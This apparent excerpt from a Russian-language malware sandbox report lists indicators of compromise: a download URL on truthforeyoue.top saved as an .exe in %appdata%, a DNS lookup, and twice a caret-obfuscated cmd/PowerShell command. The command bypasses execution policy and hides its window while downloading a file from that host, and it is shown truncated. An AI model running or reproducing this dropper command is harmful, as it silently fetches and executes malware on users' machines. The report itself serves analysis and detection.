Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WErs^He^Ll.^exE^ ^-eXEC^uti^o^npoL^ICy ^B^Y^PAS^S ^-^NO^Pro^FiLe -^wi^NDo^w^st^yLE HI^ddE^n (^N^Ew-o^bJ^E^c^t ^sySte^M.neT.we^BCLIent).^dOWnlOadfiLe('http://truthforeyoue...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "pO^WErs^He^Ll.^exE^ ^-eXEC^uti^o^npoL^ICy ^B^Y^PAS^S ^-^NO^Pro^FiLe -^wi^NDo^w^st^yLE HI^ddE^n (^N^Ew-o^bJ^E^c^t ^sySte^M.neT.we^BCLIent).^dOWnlOadfiLe('http://truthforeyoue...' (со скрытым окном)